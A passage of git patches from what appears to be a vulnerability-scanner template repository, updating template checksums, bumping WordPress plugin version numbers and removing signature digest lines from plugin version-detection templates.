+http/technologies/wordpress/plugins/under-construction-page.yaml:03b80383063d1b4411f3f1cc8e7b6a137b6e2b9f http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 +http/technologies/wordpress/plugins/updraftplus.yaml:32de9c2afb8245195ce8187172491ca9684fb908 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 +http/technologies/wordpress/plugins/user-role-editor.yaml:cad6e6a91ac010cd17fd1e35b1d578d56ca0e9ce http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 -http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 +http/technologies/wordpress/plugins/w3-total-cache.yaml:a0d5115e66bfa2d6dbf81090be624b4a64d73242 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:01ebdfafca132781255a6f6ec81f60382b81b9e1 +http/technologies/wordpress/plugins/webp-express.yaml:f5d13542cc139ec830aeff13e5c077929aacc80d +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:95d23d0849a642b22f87871a85d63a752a5cee0a +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:ddba317f2af879f6ad0e027d27da6655b9cbd4af +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:24b77fd6ed91430118f0cb310838227012711666 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:6b2311a3f1ae8dcea5872d86304f28d2a546ba67 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:c1ea61a4e402721ef33b27308961a4087ed41d83 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:2173a4f2ec01e5fa6bd7b225795f3cc35ca2e1dc +http/technologies/wordpress/plugins/woocommerce-payments.yaml:b0f832a88e02ec946efedc142ee731db347a26cc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:658b1b735900d8a827395c8ff9ef83528cba2d61 +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d6471f781b9662155fc7a9e2e984365df6bdc7c6 +http/technologies/wordpress/plugins/woocommerce-services.yaml:75d84c2ef0329f65fb0e037f3eec4aced61312da +http/technologies/wordpress/plugins/woocommerce.yaml:2b3f706bdc556453999c1c71f0d3d0f0197dbff6 +http/technologies/wordpress/plugins/wordfence.yaml:38d3ba173c391b0caa1978c3861e90de0459d0a9 +http/technologies/wordpress/plugins/wordpress-importer.yaml:3c606b380b15b889824d26556250370f9edc84cc +http/technologies/wordpress/plugins/wordpress-seo.yaml:1c1ab0737f1bdf84ec9c1cb5750d5c782ad3b9a3 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:e9d87857aeda385f37247cbaae1a14bf15d36524 +http/technologies/wordpress/plugins/wp-crontrol.yaml:48c054f88fe88cbd979b7ac455617457192e7cb2 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:e19948582e13819be5e9acf6c1d3765c3de5a704 +http/technologies/wordpress/plugins/wp-file-manager.yaml:4cf658db32d312c63cf6b5715d4a6cea2b33d9dc +http/technologies/wordpress/plugins/wp-google-maps.yaml:49221388455f512da573ed4cdd4df1f184868f6a +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:1df9e28e73d982b1a509996ba10b5b03bae1d4ea +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:171f72065feaf6cf25491a3353ee6df38e9e6b17 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:1ab1059569a2f9ef5b48112fbccfdf3e7095d3c6 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:cfc8ae16b026af7ad69b9bb07b0a66d13cdbc647 +http/technologies/wordpress/plugins/wp-optimize.yaml:43d82149b10623f2d435788379b578af224e37cc +http/technologies/wordpress/plugins/wp-pagenavi.yaml:90b8467075ce059d05d674367f2729b8082bdb35 +http/technologies/wordpress/plugins/wp-reset.yaml:3641e983d6513970ad8bdf404fdb7cbb208f36f8 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:cb76d98207fa1baf92b33d2be961469f4acddbd7 +http/technologies/wordpress/plugins/wp-rollback.yaml:2af37b20a937ec5a9aa2e4e895165516f3483fdd +http/technologies/wordpress/plugins/wp-seopress.yaml:1dba7cc2c0cf24c564f6aa099ab618d0e93b0001 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:c19ab759a84a756554d6c81f3e24ca58aebb305c +http/technologies/wordpress/plugins/wp-smushit.yaml:834f754e1b911792c082cb1934e014e70db0234c +http/technologies/wordpress/plugins/wp-statistics.yaml:435065cf69fa5db3b04ebedf0a3427df7429972f +http/technologies/wordpress/plugins/wp-super-cache.yaml:04a832caf97532056c95f255f6ea64cd669f9719 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:24f928ba5f4994e6e5492698141edd9c0fbda893 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:47be55a9e105f3bd24c7c77d94fda06f52626c56 +http/technologies/wordpress/plugins/wpforms-lite.yaml:3655b4bdbe80bc61695465e4cdd5f579563c746c +http/technologies/wordpress/plugins/wps-hide-login.yaml:242631b40f523ff13bbe2626bfdd668398b1627d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c64e5fb4d749c84df32fde6adb98b7808861434d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:5d684f1d08b99fe24149050622a3f6ff1ca6a53a http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8945,7 +8946,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f4d6016b47852c40cb6b55e31f0a464cc9db177a +templates-checksum.txt:a3ea9eb00c30bbf5b2abb8425182ddd14ad792fc vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From e03bd0d6cfe127e5122192548b0a97b965b6cdc7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 00:22:30 +0000 Subject: [PATCH 1786/1841] Auto WordPress Plugins Update [Thu Aug 1 00:22:30 UTC 2024] :robot: --- helpers/wordpress/plugins/chaty.txt | 2 +- helpers/wordpress/plugins/copy-delete-posts.txt | 2 +- helpers/wordpress/plugins/google-listings-and-ads.txt | 2 +- helpers/wordpress/plugins/gutenberg.txt | 2 +- helpers/wordpress/plugins/hostinger.txt | 2 +- helpers/wordpress/plugins/pixelyoursite.txt | 2 +- helpers/wordpress/plugins/woocommerce-payments.txt | 2 +- helpers/wordpress/plugins/wp-smushit.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluent-smtp.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../wordpress/plugins/google-listings-and-ads.yaml | 3 +-- http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - .../technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - .../technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 208 files changed, 9 insertions(+), 209 deletions(-) diff --git a/helpers/wordpress/plugins/chaty.txt b/helpers/wordpress/plugins/chaty.txt index 6a3913b049..132d9f7707 100644 --- a/helpers/wordpress/plugins/chaty.txt +++ b/helpers/wordpress/plugins/chaty.txt @@ -1 +1 @@ -3.2.7 \ No newline at end of file +3.2.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/copy-delete-posts.txt b/helpers/wordpress/plugins/copy-delete-posts.txt index b000a6a063..721b9931f4 100644 --- a/helpers/wordpress/plugins/copy-delete-posts.txt +++ b/helpers/wordpress/plugins/copy-delete-posts.txt @@ -1 +1 @@ -1.4.7 \ No newline at end of file +1.4.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-listings-and-ads.txt b/helpers/wordpress/plugins/google-listings-and-ads.txt index 62ae32d582..6533b66871 100644 --- a/helpers/wordpress/plugins/google-listings-and-ads.txt +++ b/helpers/wordpress/plugins/google-listings-and-ads.txt @@ -1 +1 @@ -2.7.7 \ No newline at end of file +2.8.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/gutenberg.txt b/helpers/wordpress/plugins/gutenberg.txt index 6238d6cf77..a2e88ffb42 100644 --- a/helpers/wordpress/plugins/gutenberg.txt +++ b/helpers/wordpress/plugins/gutenberg.txt @@ -1 +1 @@ -18.8.0 \ No newline at end of file +18.9.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/hostinger.txt b/helpers/wordpress/plugins/hostinger.txt index 7da3c16870..8ffc1ad640 100644 --- a/helpers/wordpress/plugins/hostinger.txt +++ b/helpers/wordpress/plugins/hostinger.txt @@ -1 +1 @@ -3.0.5 \ No newline at end of file +3.0.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pixelyoursite.txt b/helpers/wordpress/plugins/pixelyoursite.txt index a50bd44872..c83418e835 100644 --- a/helpers/wordpress/plugins/pixelyoursite.txt +++ b/helpers/wordpress/plugins/pixelyoursite.txt @@ -1 +1 @@ -9.7.0.1 \ No newline at end of file +9.7.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt index e048e60ec1..5210382a7a 100644 --- a/helpers/wordpress/plugins/woocommerce-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-payments.txt @@ -1 +1 @@ -7.9.2 \ No newline at end of file +8.0.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-smushit.txt b/helpers/wordpress/plugins/wp-smushit.txt index 185e484bdd..3cd036c470 100644 --- a/helpers/wordpress/plugins/wp-smushit.txt +++ b/helpers/wordpress/plugins/wp-smushit.txt @@ -1 +1 @@ -3.16.5 \ No newline at end of file +3.16.6 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index abaf3eff08..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f36c560f74676f791f1934da3e3fa2a1c34045ba97b7cb378f6da7118e1372f5022007f4901c1254dbe0ea148b66aeda99bde7c358a4e8ae6914cd6aa459c03d00b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index b1906e5aad..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022047b773e54b7d2133d0d0a410d1af46f4040e06e6117e1aaf3a95d0d69997c53102203b01dcf3bbf908b9abe4da67f2a9e9a0ed22ab9150241be31cceefa91ea2f015:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 11f16d7668..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202ce33574e3b018b75d389fee9fd3636b5aece92b5e58066a53bc43324c9dd57a022012815c05d76395e0c8f9b873d4552fb60b841e9472f8f26219c3fcdc3ecdb697:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cb2983c073..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 